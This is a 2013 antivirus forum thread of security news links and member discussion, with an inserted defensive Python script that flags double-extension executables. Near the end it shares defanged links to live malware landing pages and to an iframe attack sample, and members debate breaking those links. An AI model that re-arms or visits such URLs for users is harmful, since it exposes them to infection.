http://nakedsecurity.sophos.com/2013/04/17/malware-boston-marathon-bombing/
-
There really is nothing new here, whatever the major topic in the news is these leaches come crawling out from under their rock to take advantage.
-
http://nakedsecurity.sophos.com/2013/04/17/malware-boston-marathon-bombing/
Topic back on track, and thanks for sharing. As DavidR says, this is normal behavior for spammers and malware writers seeking to exploit the naive users and newbies.
-
Oracle Critical Patch Update Advisory - April 2013
http://www.oracle.com/technetwork/topics/security/cpuapr2013-1899555.html
-
The Bearer of BadNews
https://blog.lookout.com/blog/2013/04/19/the-bearer-of-badnews-malware-google-play/
-
Flawed Malwarebytes security update wipes out thousands of computers
http://www.theinquirer.net/inquirer/news/2262248/flawed-malwarebytes-security-update-wipes-out-thousands-of-computers
-
Malware On Mobile Grew 163% In 2012, Infecting Around 32.8M Android Devices, Report Says
http://techcrunch.com/2013/04/15/malware-on-mobile-grew-163-in-2012-infecting-around-32-8m-android-devices-report-says/
-
Just after the monster patch cycle another gaping java hole detected by Gowdiak:
http://archives.neohapsis.com/archives/fulldisclosure/2013-04/0282.html
http://www.security-explorations.com/en/SE-2012-01-status.html (nr. 61 there)
polonus
-
Trojan coders continue to attack on Russia and CIS countries
http://translate.google.ru/translate?sl=ru&tl=en&js=n&prev=_t&hl=ru&ie=UTF-8&eotf=1&u=http%3A%2F%2Fnews.drweb.com%2Fshow%2F%3Fi%3D3475%26lng%3Dru%26c%3D5&act=url
19.4.2013 - 130419-0
Many modifications of this exploit have been added to the database under that number.
RTF:CVE-2012-0158-AR [Expl]
This record catches many modifications of the exploit that distributes Trojan.Encoder.
Thank you so much, Milos, for your promptness in processing the samples
(both Trojans and exploits).
-
Hi Dimitrij,
Hope the algorithm is soon being made available so protection can be provided, as algorithms, when known, have a certain predictability,
Damian
-
Groundhog day for routers
http://www.h-online.com/security/news/item/Groundhog-day-for-routers-1847381.html
-
How a small twitter message could influence the Dow-Jones: See: http://en.wikipedia.org/wiki/High-frequency_trading
and http://qz.com/77464/how-the-syrian-electronic-army-hacked-the-ap-and-who-are-these-guys-anyway/ (link article author = Mike Baker)
and combine the info in both articles to know what happens inside racks in pitch-dark concrete bunkers that do high frequency trading...
and suddenly a flash crash like this one...
polonus
-
According to a Symantec report, Opera and IE have the lowest number of vulnerabilities;
see charts. http://www.dinside.no/915410/faerreste-saarbarheter-i-opera
-
55% of net users use the same password for most, if not all, websites. When will they learn? (http://nakedsecurity.sophos.com/2013/04/23/users-same-password-most-websites/)
This is something I always stress and sometimes wonder if any one actually listens. :(
-
55% of net users use the same password for most, if not all, websites. When will they learn? (http://nakedsecurity.sophos.com/2013/04/23/users-same-password-most-websites/)
This is something I always stress and sometimes wonder if any one actually listens. :(
I guess a lot of users have never heard of Lastpass add-on tool to their web browser no wonder they're using the same password for most websites what a shame :-\ :o
-
WordPress cache plugins enabled remote PHP execution
http://www.h-online.com/security/news/item/WordPress-cache-plugins-enabled-remote-PHP-execution-1848961.html
-
According to a Symantec report, Opera and IE have the lowest number of vulnerabilities;
see charts. http://www.dinside.no/915410/faerreste-saarbarheter-i-opera
Not that many people use Opera on a regular basis. We should look for vulnerabilities in more common browsers, n'est-ce pas?
-
According to a Symantec report, Opera and IE have the lowest number of vulnerabilities;
see charts. http://www.dinside.no/915410/faerreste-saarbarheter-i-opera
Not that many people use Opera on a regular basis. We should look for vulnerabilities in more common browsers, n'est-ce pas?
Well there are a few that use IE ;)
-
According to a Symantec report, Opera and IE have the lowest number of vulnerabilities;
see charts. http://www.dinside.no/915410/faerreste-saarbarheter-i-opera
Not that many people use Opera on a regular basis. We should look for vulnerabilities in more common browsers, n'est-ce pas?
Well there are a few that use IE ;)
And IE isn't as flexible as Firefox and Chrome, thus IE has less vulnerabilities.
-
U.S. gives big, secret push to Internet surveillance
http://news.cnet.com/8301-13578_3-57581161-38/u.s-gives-big-secret-push-to-internet-surveillance/
https://epic.org/2013/04/epic-foia-request-reveals-deta.html
-
Apache Binary Backdoors on Cpanel-based servers
http://blog.sucuri.net/2013/04/apache-binary-backdoors-on-cpanel-based-servers.html
-
Google locks down updating on Play store
http://www.h-online.com/open/news/item/Google-locks-down-updating-on-Play-store-1851695.html
-
More fake SourceForge websites showing up: http://research.zscaler.com/2013/04/more-fake-sourceforge-websites-show-up.html
link article author for Zscaler Research = Julien Sobrier
polonus
-
Watering Hole Attack Claims US Department of Labor Website (http://threatpost.com/watering-hole-attack-claims-us-department-of-labor-website/)
-
Malware invades 90% of pirate computer games
http://blogs.norman.com/2013/for-consumption/malware-invades-90-of-pirate-computer-games
-
Loads of websites are buggy and pose a security threat:
# 86% of all websites had at least one serious* vulnerability.
# The average number of serious* vulnerabilities identified per website was 56, continuing the downward trend from 79 in 2011 and 230 in 2010.
# Serious* vulnerabilities were resolved in an average of 193 days from first notification.
# 61% of all serious* vulnerabilities were resolved, slightly less than the 63% from 2011, but still up from 53% in 2010 and far better than 2007 when it was just 35%.
Quotes taken from this report review here: https://www.whitehatsec.com/resource/stats.html
Link article author: Jeremiah Grossman
polonus
-
Microsoft Security Advisory (2847140)
Vulnerability in Internet Explorer Could Allow Remote Code Execution
http://technet.microsoft.com/en-us/security/advisory/2847140
http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx
-
Just to save an unnecessary jump to see if the vulnerability affects you, MS says in that bulletin that only IE-8 is involved in this case; 6, 7, 9 and 10 aren't affected.
-
Can Facebook videos be a scam?
Q. I tried to watch a video on Facebook, but it didn't work. It made me install a new driver and then still didn't play the video. What gives?
A. I doubt that was a real video at all. This is a scam that is common on Facebook. The post looks like a really interesting or scandalous video. When you click it, it asks you to install a driver to watch it. What you actually download is usually a junk file or a virus.
http://www.foxnews.com/tech/2013/05/05/5-burning-tech-questions-answered/
-
An avi file extension is not a guarantee that the file is a video file. You could get any .exe virus and rename it to .avi and download malware...
polonus
-
Can Facebook videos be a scam?
Q. I tried to watch a video on Facebook, but it didn't work. It made me install a new driver and then still didn't play the video. What gives?
A. I doubt that was a real video at all. This is a scam that is common on Facebook. The post looks like a really interesting or scandalous video. When you click it, it asks you to install a driver to watch it. What you actually download is usually a junk file or a virus.
http://www.foxnews.com/tech/2013/05/05/5-burning-tech-questions-answered/
I watch videos on Facebook almost every day and have never had any new drivers installed.
-
Hi -midnight,
Well that means you only watch good vids,
polonus
-
Hi polonus
Yep! I watch only good ones.
-
hi -midnight,
If you already have not done so, change your file extensions so that all file extensions are viewable and visible to you.
In XP, Open Control Panel>Folder Options>View tab>Untick (uncheck) box for "Hide file extensions for known file types">Close Folder Options. What that will do for you is display all file extensions for any file you download or run.
Do not know path for Win 7, but am sure it is something similar...
If you see a file with the extension ending in .avi.exe (double extension) then that file is an executable file and is almost certainly malware. You will not see either extension unless you untick hide file extensions first, and would therefore run a malicious executable file and get infected. One more layer of security when this is done (that would be you).
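A small added example (not from the forum post) of the double-extension check described above: it reproduces what Explorer shows when "Hide file extensions for known file types" is ticked and flags names such as clip.avi.exe whose real extension is executable. The extension lists and sample file names are constructed for the example.

```python
"""Spot downloads that look like media but would run as executables.

Added example, not from the forum post. Extension sets below are assumed
(partial) lists, and the sample names at the bottom are constructed.
"""
import os

# Extensions Windows will execute when the file is double-clicked (assumed list).
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".bat", ".cmd", ".pif", ".vbs", ".js", ".msi"}
# Extensions a user expects for a video, image or document (assumed list).
MEDIA_EXTS = {".avi", ".mp4", ".mkv", ".mov", ".wmv", ".mp3", ".jpg", ".png", ".pdf"}


def analyze_filename(name: str) -> dict:
    """Return a verdict for one downloaded file name.

    With extensions hidden, Explorer strips only the LAST extension, so
    'clip.avi.exe' is displayed as 'clip.avi'. We reproduce that display
    name and compare it with what the file would really run as.
    """
    base = os.path.basename(name.replace("\\", "/"))
    root, last = os.path.splitext(base)
    last = last.lower()
    _, inner = os.path.splitext(root)   # the extension that remains visible
    inner = inner.lower()

    executable = last in EXECUTABLE_EXTS
    double_ext = bool(inner)
    # The dangerous case from the post: visible part says "video", real part runs code.
    deceptive = executable and inner in MEDIA_EXTS

    if deceptive:
        reason = f"displayed as '{root}' with extensions hidden, but really runs as {last}"
    elif executable:
        reason = f"executable file ({last}), not a media file"
    elif double_ext:
        reason = f"double extension {inner}{last}; check the real file type"
    elif last in MEDIA_EXTS:
        reason = "extension matches a media/document type"
    else:
        reason = "nothing suspicious from the name alone"

    return {
        "displayed_name": root if last else base,  # what Explorer shows when hiding
        "real_extension": last,
        "executable": executable,
        "deceptive": deceptive,
        "reason": reason,
    }


def flag_downloads(names):
    """Return only the names that are executables or deceptive double extensions."""
    return [n for n in names if analyze_filename(n)["executable"]]


if __name__ == "__main__":
    # Constructed sample download names for the demo.
    samples = [
        "funny_video.avi.exe",
        "holiday.mp4",
        "setup.exe",
        "archive.tar.gz",
        "C:\\Users\\me\\Downloads\\scandal.mp4.scr",
    ]
    for n in samples:
        v = analyze_filename(n)
        print(f"{n:45} shown as {v['displayed_name']:25} -> {v['reason']}")
```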
-
Dangerous Trojan substitutes web page
http://translate.google.ru/translate?hl=ru&sl=ru&tl=en&u=http%3A%2F%2Fnews.drweb.com%2Fshow%2F%3Fi%3D3511%26lng%3Dru%26c%3D5
http://vms.drweb.com/virus/?i=2504006&lng=en
-
Microsoft Security Advisory (2847140)
Vulnerability in Internet Explorer Could Allow Remote Code Execution
http://technet.microsoft.com/en-us/security/advisory/2847140
http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx
Exploit for new IE8 0-day vulnerability in the wild
http://www.h-online.com/security/news/item/Exploit-for-new-IE8-0-day-vulnerability-in-the-wild-1857966.html
-
Microsoft Security Advisory (2847140)
Vulnerability in Internet Explorer Could Allow Remote Code Execution
http://technet.microsoft.com/en-us/security/advisory/2847140
http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx
Exploit for new IE8 0-day vulnerability in the wild
http://www.h-online.com/security/news/item/Exploit-for-new-IE8-0-day-vulnerability-in-the-wild-1857966.html
Fix available: http://support.microsoft.com/kb/2847140#FixItForMe
-
Security Advisory for ColdFusion
http://www.adobe.com/support/security/advisories/apsa13-03.html
-
FixIt for the gaping hole in IE8 on XP: http://support.microsoft.com/kb/2847140#FixItForMe
polonus
-
FixIt for the gaping hole in IE8 on XP: http://support.microsoft.com/kb/2847140#FixItForMe
polonus
You're a little late. :)
Microsoft Security Advisory (2847140)
Vulnerability in Internet Explorer Could Allow Remote Code Execution
http://technet.microsoft.com/en-us/security/advisory/2847140
http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx
Exploit for new IE8 0-day vulnerability in the wild
http://www.h-online.com/security/news/item/Exploit-for-new-IE8-0-day-vulnerability-in-the-wild-1857966.html
Fix available: http://support.microsoft.com/kb/2847140#FixItForMe
-
Yahoo Mail Blocked by Browsers in Malvertising Chain Reaction (http://www.hotforsecurity.com/blog/yahoo-mail-blocked-by-browsers-in-malvertising-chain-reaction-6124.html)
-
Well, if one has AdBlock Plus installed as a browser add-on, these sort of ads will be blocked from downloading into the browser window, and no warning will appear.
An added layer of protection to have along with WebShield in avast! I never did see this warning.
-
Well, if one has AdBlock Plus installed as a browser add-on, these sort of ads will be blocked from downloading into the browser window, and no warning will appear.
An added layer of protection to have along with WebShield in avast! I never did see this warning.
Then having avast! Online Security and Web Reputation Plugin installed would have the same effect since it includes the AdBlocker. :)
I've also never seen the ad.
-
Microsoft Security Bulletin Advance Notification for May 2013
http://technet.microsoft.com/en-us/security/bulletin/ms13-may
-
Cybercriminals 'drained ATMs' in $45m world bank heist
http://www.bbc.co.uk/news/world-us-canada-22470299
$45M Bank Hack Suspect Was Shot Dead While Playing Dominoes
http://www.wired.com/threatlevel/2013/05/bank-cashing-suspect-killed/
-
Prenotification Security Advisory for Adobe Reader and Acrobat
http://www.adobe.com/support/security/bulletins/apsb13-15.html
-
Protect your privacy on Google
Do you know every Google search you've ever performed is stored on the search giant's servers? And that data is cross-linked to your search data from YouTube, Google Maps and any other Google services you use.
http://www.foxnews.com/tech/2013/05/12/protect-your-privacy-on-google/
-
Protect your privacy on Google
Do you know every Google search you've ever performed is stored on the search giant's servers? And that data is cross-linked to your search data from YouTube, Google Maps and any other Google services you use.
http://www.foxnews.com/tech/2013/05/12/protect-your-privacy-on-google/
Certainly not anything new and not something that isn't done by the other search services. :)
(Sending a "Do not track request" also doesn't guarantee anonymity.)
-
International Space Station making laptop migration from Windows XP to Debian 6
An incident in 2008 apparently made space-station personnel more aware than ever of a computer virus' ability to disrupt operations in the absence of support from an open source community. That was the year the station computers were infected by the Gammina.AG. Virus after an astronaut brought an infected USB or flash drive into orbit. The virus infected other computers on board.
http://phys.org/news/2013-05-international-space-station-laptop-migration.html
-
Firefox and Chrome extensions hijack Facebook accounts
http://www.efytimes.com/e1/fullnews.asp?edid=105970
polonus
-
Firefox and Chrome extensions hijack Facebook accounts
http://www.efytimes.com/e1/fullnews.asp?edid=105970
polonus
WOW! Does this mean I have to give up the Firefox browser or FF extensions to use MS IE10 ::) :o ............. and besides, I don't use Facebook and I don't trust it at all....... to me it's a piece of sh%t ;D like toilet paper, wiping your bare bum with it.
-
Firefox and Chrome extensions hijack Facebook accounts
http://www.efytimes.com/e1/fullnews.asp?edid=105970
polonus
WOW! Does this mean I have to give up the Firefox browser or FF extensions to use MS IE10 ::) :o ............. and besides, I don't use Facebook and I don't trust it at all....... to me it's a piece of sh%t ;D like toilet paper, wiping your bare bum with it.
In Chrome, only if you have the following extension running: chromebrasil.crx - I don't :)
-
Firefox and Chrome extensions hijack Facebook accounts
http://www.efytimes.com/e1/fullnews.asp?edid=105970
polonus
WOW! Does this mean I have to give up the Firefox browser or FF extensions to use MS IE10 ::) :o ............. and besides, I don't use Facebook and I don't trust it at all....... to me it's a piece of sh%t ;D like toilet paper, wiping your bare bum with it.
In Chrome, only if you have the following extension running: chromebrasil.crx - I don't :)
Me too, as I don't have chromebrasil.crx running. All I'm saying is that adding an extension can be a worry, because there are many users who don't have enough security awareness to watch what they're adding to the FF browser as an extension. ;)
-
The Firefox extension mentioned is mozillabrasil.xpi, which is not hosted on https://addons.mozilla.org/en-US/firefox/extensions/, the official Firefox Add-ons site. This means that it wasn't vetted as safe. As with all software, it's best to use the official sites.
-
My simple philosophy:
If an app or extension is worth its salt, it's available from the official source.
If you can't get the item from the Official Source, it isn't worth getting.
-
Govt surveillance: the goings-on on mobile Twitter, Viber, Line and WhatsApp could get narrow in some countries: http://www.thoughtcrime.org/blog/saudi-surveillance/ link article author Moxie Marlinspike
But this is probably worldwide, and they rather not like you to know: http://www.guardian.co.uk/technology/2011/nov/01/governments-hacking-techniques-surveillance
polonus
-
Encrypting your Notes on Android to Protect Yourself From Government Cellphone Surveillance [Android]
Re: http://android.16mb.com/protect-yourself-from-government-cellphone-surveillance-android.html link article author: naruto
polonus
-
Is this the real reason behind MS acquiring skype?
http://www.zdnet.com/big-brother-microsoft-listens-in-to-your-skype-ims-7000001495/
What on the Internet does not come under surveillance now?
polonus
-
Is this the real reason behind MS acquiring skype?
http://www.zdnet.com/big-brother-microsoft-listens-in-to-your-skype-ims-7000001495/
What on the Internet does not come under surveillance now?
polonus
Strange, but you agreed to all of this before Microsoft owned the service. Why is Microsoft the culprit?
-
Hi bob3160,
You are right. I pass the news as I found it.
But as you said nothing changed,
polonus
-
Hi bob3160,
You are right. I pass the news as I found it.
But as you said nothing changed,
polonus
Simply passing along what really is nothing more than Microsoft Bashing,
isn't always the best thing to do. :)
It's fairly easy to create controversial headlines in order to have people pass them along..... ;)
(I've probably been guilty of that practice a few times.)
-
Hi bob3160,
Thank you for pointing that out to me. Sincere apologies for passing that news, without mentioning actually before and after skype was acquired nothing in this respect has changed. Both abided by what the law asked of them.
Did not post this message with MS bashing at heart, just wanted to stress the surveillance aspect of it.
With old-fashioned telephone lines in Europe there is no number recognition for callers from the States, not the other way round....
polonus
-
In the hope this has not been reported here before. PushDo is back after having been downed 4 times with new enhanced evasion via DGA, read:
https://blog.damballa.com/archives/1998 link article author Damballa's Senior Researcher Jeremy Demar,
polonus
-
Computer viruses on rise for first time in years, Microsoft warns
By Jillian Scharr
Published May 17, 2013
TechNewsDaily
Cut!
In certain areas of the world the uptick was more pronounced: viruses were found on approximately 40 percent of scanned systems in Pakistan, Indonesia, Ethiopia, and Bangladesh, and on 35 percent of scanned systems in Afghanistan and 36 percent in Egypt.
These high infection rates correlate with low broadband penetration rates, Rains said. Less broadband means less opportunity for network-enabled malware like worms and Trojans to spread; the 1990s-like Internet landscape in poorer countries might create the perfect environment for viruses to thrive.
The most popular virus worldwide is called Win32/Sality, a type of infection found most frequently on machines running Windows XP.
Continued:
http://www.foxnews.com/tech/2013/05/17/true-computer-viruses-making-global-comeback-microsoft-says/?intcmp=trending
-
Is this the real reason behind MS acquiring skype?
http://www.zdnet.com/big-brother-microsoft-listens-in-to-your-skype-ims-7000001495/
What on the Internet does not come under surveillance now?
polonus
Skype's ominous link checking: facts and speculation
http://www.h-online.com/security/features/Skype-s-ominous-link-checking-facts-and-speculation-1865629.html
-
Lockscreen Win32:Lyposit displayed as a fake MacOs app (https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/)
-
A guide for journalists (and everyone else) to avoid government snoops
By John R. Quain
Published May 20, 2013
Revelations that the Department of Justice has been secretly spying on Associated Press reporters has given rise to accusations of intimidation tactics and apparent attempts to stifle whistle-blowers and a free press. It should also ring alarm bells for anyone concerned about their own privacy and freedom.
Continued:
http://www.foxnews.com/tech/2013/05/20/tech-tools-to-keep-one-step-ahead-feds/
-
Don't fear the hangover - Network detection of hangover malware samples
http://blogs.rsa.com/dont-fear-the-hangover-network-detection-of-hangover-malware-samples/
http://blogs.norman.com/2013/security-research/the-hangover-report
http://enterprise.norman.com/resource_center/unveiling_an_indian_cyberattack_infrastructure-a_special_report
http://www.welivesecurity.com/2013/05/16/targeted-threat-pakistan-india/
-
Watch out for ustealer: http://blogs.technet.com/b/mmpc/archive/2013/05/22/how-easily-usteal-my-passwords.aspx
link article author = Alden Pornasdoro MMPC
polonus
-
Malware in the Google Play Store: Enemy inside the gates (http://www.techrepublic.com/blog/google-in-the-enterprise/malware-in-the-google-play-store-enemy-inside-the-gates/2445)
-
Google researcher reveals another Windows 0-day (https://www.net-security.org/secworld.php?id=14954)
Probably a very good reason to not allow any one else access to your computer
unless you truly trust that person.
-
Sorry, posted info in wrong place: http://forum.avast.com/index.php?topic=19387.msg944623#msg944623
Local Windows Kernel Exploit per Secunia.
-
New Google Chrome version update: http://forum.avast.com/index.php?topic=19387.msg944624#msg944624
-
PayPal.com XSS Vulnerability
http://seclists.org/fulldisclosure/2013/May/163
-
:-X Pro did not detect the PUM hijack, but I got a "mal" warning two days ago, and I guess Pro let it in; Malwarebytes removed the PUM hijack today, so.
-
:-X Pro did not detect the PUM hijack, but I got a "mal" warning two days ago, and I guess Pro let it in; Malwarebytes removed the PUM hijack today, so.
Never heard of a pum hijack.
Care to give some details on the MBAM detection of it, the contents of the MBAM scan log should give the file name, location, malware name, etc.
Note this topic is nothing to do with avast detections or not, but about security warnings and notices in general.
The viruses and worms forum is for avast detections or missed detections, so you should start your own new topic there giving the detailed information asked for.
-
Ok, I just need to know how to stop the Malicious URL Blocked pop-up from popping up. Are there any glitches in it, or has anyone else had trouble with pop-ups?
-
Ok, I just need to know how to stop the Malicious URL Blocked pop-up from popping up. Are there any glitches in it, or has anyone else had trouble with pop-ups?
Sorry, you're posting your issue in the wrong part of the forum.
This area has to do with technical geek issues and malware exploits of common programs.
Suggest going here to this link and starting a new topic: http://forum.avast.com/index.php?board=4.0 Once there, log in and click New Topic and begin the process of getting the help you need. Please note the sticky "Logs to assist in cleaning malware" at the top of that forum board. Please only run the first four programs and attach all logs in the new thread you created there, not here. Follow all instructions in the malware log topic and await help. Help will arrive as soon as the logs are posted, or soon after.
-
Chinese Hackers Have Stolen Sensitive US Weapon Design Files
Quote:
"Making the list of system designs stolen during the hack include: the advanced Patriot missile system (PAC-3); a system for shooting down ballistic missiles known as the Terminal High Altitude Area Defense (THAAD); and the Navy's Aegis ballistic-missile defense system. Elsewhere, classified details regarding the F/A-18 fighter jet, the F-35 Joint Strike Fighter, the V-22 Osprey, the Black Hawk helicopter and the Navy's new Littoral Combat Ship were also nabbed"
http://www.washingtonpost.com/world/national-security/confidential-report-lists-us-weapons-system-designs-compromised-by-chinese-cyberspies/2013/05/27/a42c3e1c-c2dd-11e2-8c3b-0b5e9247e8ca_story.html
If you ask me, these are the most powerful weapons in the U.S. arsenal. The Chinese will probably reverse engineer them within 5-10 years.
-
Seriously? USA to legalize rootkits, spyware, ransomware and trojans to combat piracy?
http://blog.emsisoft.com/2013/05/27/seriously-usa-to-legalize-rootkits-spyware-ransomware-and-trojans-to-combat-piracy/
-
Seriously? USA to legalize rootkits, spyware, ransomware and trojans to combat piracy?
http://blog.emsisoft.com/2013/05/27/seriously-usa-to-legalize-rootkits-spyware-ransomware-and-trojans-to-combat-piracy/
It always pays to read the whole article. Just because someone makes a proposal, doesn't make it reality.
-
Seriously? USA to legalize rootkits, spyware, ransomware and trojans to combat piracy?
http://blog.emsisoft.com/2013/05/27/seriously-usa-to-legalize-rootkits-spyware-ransomware-and-trojans-to-combat-piracy/
It always pays to read the whole article. Just because someone makes a proposal, doesn't make it reality.
I knew it, somebody would say the same thing that was going through my mind: "Just because someone makes a proposal, doesn't make it reality" ;) :) 8) Thank you Bob, because I had to check that my thought was correct, as I wasn't too sure.
Edit: I hope I wasn't wasting your time, Bob?
-
RoR CVE-2013-0156 in the Wild
http://jarmoc.com/blog/2013/05/28/ror-cve-2013-0156-in-the-wild/
-
Analysis of a self-debugging Sirefef cryptor (https://blog.avast.com/2013/05/29/analysis-of-a-self-debugging-sirefef-cryptor/)
-
Twitter's 2 step verification is easily compromised (http://securitywatch.pcmag.com/hacking/311869-how-to-hack-twitter-s-two-factor-authentication)
-
Google changing its SSL Certificates (http://googleonlinesecurity.blogspot.com/2013/05/changes-to-our-ssl-certificates.html)
"all of our SSL certificates will be upgraded to 2048-bit keys by the end of 2013."
I'd say that will turn SSL into SuperSSL
-
Log file vulnerability in Apache server
http://www.h-online.com/open/news/item/Log-file-vulnerability-in-Apache-server-1873651.html
-
Privacy no longer exists as I've said for a long time
If you think you can hide, you're sadly mistaken.
The following article and their Video (32 min) proves my point:
http://www.geek.com/mobile/mini-documentary-shines-a-light-on-the-surveillance-state-1556671/
-
PayPal.com XSS Vulnerability
http://seclists.org/fulldisclosure/2013/May/163
PayPal vulnerability finally closed
http://www.h-online.com/security/news/item/PayPal-vulnerability-finally-closed-1873322.html
-
Old Soviet Union domain name attracts cybercriminal interest
Published May 31, 2013
Associated Press
MOSCOW – The Soviet Union disappeared from the map more than two decades ago. But online an 'e-vil empire' is thriving.
Security experts say the .su Internet suffix assigned to the USSR in 1990 has turned into a haven for hackers who've flocked to the defunct superpower's domain space to send spam and steal money.
http://www.foxnews.com/tech/2013/05/31/ussr-old-domain-name-attracts-cybercriminals/?intcmp=HPBucket
-
Hi Johnny4745,
Thanks for that heads-up! Appreciated...
With this google search query we can get a general idea what is out there and what malcode awaits us at dot su: https://www.google.nl/search?q=urlquery.net+su&oq=urlquery.net+su&aqs=chrome.0.57.13369j0&sourceid=chrome&ie=UTF-8
Newest trojans from here for instance: https://www.virustotal.com/nl/url/45a530e0af9498f7b4776f3bd0329f3e96895a3466f26ad8e8ccb4ef267a511e/analysis/
re: http://regrunreanimator.com/newvirus/trojan/pkc-exe.htm
And another one with indicator obfuscation and Blackhole landing: http://urlquery.net/report.php?id=2603621
see: http://playingwithothers.com/2013/03/06/blackhole-landing-page-obfuscation-example/ (link article author = Chris Jordan)
Here the trojan is directly blocked by avast! Web Shield as JS:Includer-NS[Trj] for urlquery etc / php?id=43243|{gzip}
htXp://urlquery.net/report.php?id=43243 (do not visit)
polonus
-
P2P botnets, new threat, much more resistant to takedown, and are larger than first estimated.
Sality, ZeroAccess, Zeus, use this type of network to control and infect. http://www.h-online.com/security/news/item/P2P-botnets-much-larger-than-they-seemed-1874071.html
-
Google researcher discloses zero-day exploit for Windows
http://www.h-online.com/security/news/item/Google-researcher-discloses-zero-day-exploit-for-Windows-1876170.html
-
Google researcher discloses zero-day exploit for Windows
http://www.h-online.com/security/news/item/Google-researcher-discloses-zero-day-exploit-for-Windows-1876170.html
It may not be the "correct" thing to do by Ormandy but, it should result in a quick fix by MS.
If you don't get infected by this exploit, you'll soon wind up with a more secure system. ;)
-
Fake Chrome Browser Window to be used by miscreants, built by Jack Shepherd: htXp://www.jack-shepherd.co.uk/labs/fake_chrome_browser
This could be used by attackers. See for the iFrame attack -> htxp://jsunpack.jeek.org/?report=34695c83a32b4d908a720337bae11130a45c136e
(for security researchers only, only visit in VM with script blocking enabled)
pol
-
Fake Chrome Browser Window to be used by miscreants, built by Jack Shepherd: hxxp://www.jack-shepherd.co.uk/labs/fake_chrome_browser
This could be used by attackers. See for the iFrame attack -> hxxp://jsunpack.jeek.org/?report=34695c83a32b4d908a720337bae11130a45c136e
(for security researchers only, only visit in VM with script blocking enabled)
pol
Should the links be live?
-
Yes I believe the jsunpack one needs to be broken as it has the example/sample code in the results page, see image for some of my web shield exclusions for some analysis sites.
Though the hxxp://jsunpack.jeek.org/?report=34695....... URL differs from my exclusion and no avast alert.
-
Hi DavidR,
Link has been broken, but the serious issue here is that we have no avast! protection for that iFrame malcode (demo) yet and that is why I reported it here.
Have to report to virus AT avast dot com.
Well, bob3160's reaction could be seen as a bit exaggerated because there still was no malicious payload attached. It was just reported as "see what malcreants could do with this knowledge"... the publication by Jack Shepherd could be seen as questionable, but now that the proverbial cat seems out of the bag, better seek protection against the abuse of it in the future....
polonus
-
Well, bob3160's reaction could be seen as a bit exaggerated
we have no avast! protection for that iFrame malcode
If there's no protection (real or sample) the link needs to be broken. :o
-
Hi bob3160,
Understand that there cannot be protection for a demo as long as there is no malcode or payload in it. The only questionable thing is Jack Shepherd's publication of the possibilities of this scheme for abuse. It is like a bow without an arrow, so you cannot have detection, or the method or the fake page should be detected as risky. Good that we alerted it in this preliminary stage, so we do not have to wait for protection once malcreants get wind of it, and they soon will....
Whether Jack Shepherd should have put this online is debatable; it just depends whether you are in the camp of "security through obscurity" or rather like to prepare for existing threats....
polonus
P.S. What I did, and DavidR always finds this the most important part of the threat procedure, is report this possible abuse with a fake Google Chrome page layout to virus AT avast dot com
Damian
-
Well the web shield has been pretty hot in iframe malware, especially hidden iframes, even without knowing what the payload is. Not to mention that payload has to be hosted somewhere and that may well be a malicious or hacked site and the network shield should also come into its own here and also the web shield on hacked sites is pretty hot. So I wouldn't say that avast has no defence against this.
EDIT: Not to mention NoScript and RequestPolicy addons in firefox. I don't know if this attempts to look like a chrome browser window, in which case those not using chrome (me) would be somewhat suspicious about this anyway.
-
Virus Total now detects social engineering in media files: http://www.h-online.com/security/news/item/VirusTotal-detects-social-engineering-in-media-files-1876237.html
Kaspersky blog about "NetTraveler is Running": http://www.securelist.com/en/blog/8105/NetTraveler_is_Running_Red_Star_APT_Attacks_Compromise_High_Profile_Victims
-
Majority of Users Still Vulnerable to Java Exploits
http://community.websense.com/blogs/securitylabs/archive/2013/06/04/majority-of-users-still-vulnerable-to-java-exploits.aspx
-
Microsoft Security Bulletin Advance Notification for June 2013
http://technet.microsoft.com/en-us/security/bulletin/ms13-jun
-
Facebook Alert: The ZeuS Trojan is spreading among Facebook users. Avoid clicking suspicious videos, even from friends. Zeus steals bank passwords and empties accounts! Read more on our blog, http://goo.gl/urRxA - private
-
Hetzner web hosting service hacked, customer data copied
http://www.h-online.com/security/news/item/Hetzner-web-hosting-service-hacked-customer-data-copied-1884574.html
-
So you think you can [image] ?
Better think again:
http://arstechnica.com/tech-policy/2013/06/new-leak-feds-can-access-anything-in-your-google-facebook-and-more/
If you don't want to share something, don't reveal it anywhere in the first place.
Your private thoughts are next for the chopping block. :'(
-
If you don't want to share something, don't reveal it anywhere in the first place.
Your private thoughts are next for the chopping block. :'(
Heard about that, it's sad. :(
-
Hi bob3160 and Asyn,
Well something we expected to be so became more credible with this news.
Yes, and it is a sad thing actually for those corporations that were forced to cooperate.
We as mere users should always have at the back of our heads that all we do on the Internet is actually done in public,
same as we would stand on a soapbox in HydePark (only this time on a global scale).
Good thing that this data collecting was only for data from citizens outside the USA...
polonus
-
Hi bob3160 and Asyn,
Well something we expected to be so became more credible with this news.
Yes, and it is a sad thing actually for those corporations that were forced to cooperate.
We as mere users should always have at the back of our heads that all we do on the Internet is actually done in public,
same as we would stand on a soapbox in HydePark (only this time on a global scale).
Good thing that this data collecting was only for data from citizens outside the USA...
polonus
The Internet Service Providers should have refused, and forced the government to charge them with a crime or put them in jail. Then it would really get the attention it needs.
The United States is becoming no better than Communist China that blocks websites it decides the people shouldn't see.
This latest unconstitutional move by our government, which violates the protection against unreasonable search and seizure, does have the attention of Congress, and lawmakers have vowed to rein in this administration.
-
The United States is becoming no better than Communist China that blocks websites it decides the people shouldn't see.
There is a difference. In this country it is being done "legally". ;) :o :'(
-
The United States is becoming no better than Communist China that blocks websites it decides the people shouldn't see.
There is a difference. In this country it is being done "legally". ;) :o :'(
+1 to all of the above. No more isolationist posture(s) is available now or in the future. Think "WWI Isolationists" when at that time it might have been possible for the US to not enter the first world war; no Internet existed then. Now, we are more interconnected, as in worldwide, than we ever have been. With this interconnectivity comes a certain erosion of personal privacy, (and) some of that is what we have done to ourselves.
-
Hi mchain,
Agree, but there is a positive side to it as well as we are like cells that become aware they form part of a larger organ and in the end are one body together.
This is making the status of these mortal cells more "irrelevant",
polonus
-
